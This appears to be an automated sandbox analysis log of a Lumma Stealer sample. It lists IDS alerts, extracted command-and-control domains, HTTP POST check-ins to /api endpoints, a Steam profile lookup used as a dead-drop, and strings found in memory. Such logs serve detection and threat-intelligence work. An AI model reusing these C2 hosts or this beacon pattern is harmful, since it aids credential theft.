Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.77.78:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.77.78:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.33.249:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49740 -> 172.67.140.193:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 172.67.140.193:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49745 -> 172.67.206.204:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.206.204:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 104.21.79.35:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49744 -> 104.102.49.254:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 104.21.79.35:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49746 -> 172.67.206.204:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.206.204:443
                    Source: Malware configuration extractor. URLs: drawwyobstacw.sbs
                    Source: Malware configuration extractor. URLs: resinedyw.sbs
                    Source: Malware configuration extractor. URLs: condifendteu.sbs
                    Source: Malware configuration extractor. URLs: mathcucom.sbs
                    Source: Malware configuration extractor. URLs: allocatinow.sbs
                    Source: Malware configuration extractor. URLs: enlargkiw.sbs
                    Source: Malware configuration extractor. URLs: ehticsprocw.sbs
                    Source: Malware configuration extractor. URLs: vennurviot.sbs
                    Source: Malware configuration extractor. URLs: proclaimykn.buzz
                    Source: Joe Sandbox View. IP Address: 188.114.97.3
                    Source: Joe Sandbox View. IP Address: 104.21.33.249
                    Source: Joe Sandbox View. IP Address: 172.67.173.224
                    Source: Joe Sandbox View. ASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox View. ASN Name: AKAMAI-ASUS
                    Source: Joe Sandbox View. JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: proclaimykn.buzz
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mathcucom.sbs
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enlargkiw.sbs
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resinedyw.sbs
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vennurviot.sbs
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ehticsprocw.sbs
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condifendteu.sbs
                    Source: global traffic. HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
                    Source: global traffic. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=vKrz3Hq72H1UNZmiSDnI_ARtZuyd8ck1abtebasc0mE-1728813636-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: sergei-esenin.com
                    Source: unknown. UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global traffic. DNS traffic detected: DNS query: proclaimykn.buzz
                    Source: global traffic. DNS traffic detected: DNS query: mathcucom.sbs
                    Source: global traffic. DNS traffic detected: DNS query: allocatinow.sbs
                    Source: global traffic. DNS traffic detected: DNS query: enlargkiw.sbs
                    Source: global traffic. DNS traffic detected: DNS query: resinedyw.sbs
                    Source: global traffic. DNS traffic detected: DNS query: vennurviot.sbs
                    Source: global traffic. DNS traffic detected: DNS query: ehticsprocw.sbs
                    Source: global traffic. DNS traffic detected: DNS query: condifendteu.sbs
                    Source: global traffic. DNS traffic detected: DNS query: drawwyobstacw.sbs
                    Source: global traffic. DNS traffic detected: DNS query: steamcommunity.com
                    Source: global traffic. DNS traffic detected: DNS query: sergei-esenin.com
                    Source: unknown. HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: proclaimykn.buzz
                    Source: Setup.exe. String found in binary or memory: http://.css
                    Source: Setup.exe. String found in binary or memory: http://.jpg
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://127.0.0.1:27060
                    Source: Setup.exe. String found in binary or memory: http://html4/loose.dtd
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://allocatinow.sbs/
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://allocatinow.sbs/api
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://allocatinow.sbs/apis
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://allocatinow.sbs/pi
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://api.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://avatars.akamai.steamstatic
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://avatars.akamai.steamstatic.com/f
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://checkout.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/puN
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishc
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javY
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xT%
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/im
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
